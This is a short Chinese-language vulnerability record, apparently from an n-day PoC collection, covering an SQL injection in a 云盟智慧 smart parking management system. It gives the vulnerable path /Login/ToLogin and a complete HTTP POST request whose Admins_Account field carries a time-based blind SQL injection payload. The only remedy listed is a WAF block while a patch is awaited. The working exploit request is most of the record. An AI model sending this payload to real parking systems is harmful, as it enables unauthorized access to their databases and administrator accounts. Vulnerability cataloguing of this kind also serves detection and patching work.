vendor = "云盟智慧"
name = "智能停车管理系统ToLogin存在SQL注入漏洞"
type = "SQL注入"
version = "未知"
path = "/Login/ToLogin"
detail = "POST /Login/ToLogin HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Admins_Account=1' AND (SELECT 8104 FROM (SELECT(SLEEP(5)))dEPM) AND 'JYpL'='JYpL&Admins_Pwd="
fix = "WAF封禁路路径，等待发布补丁"
date = "0819"
label = "nday"
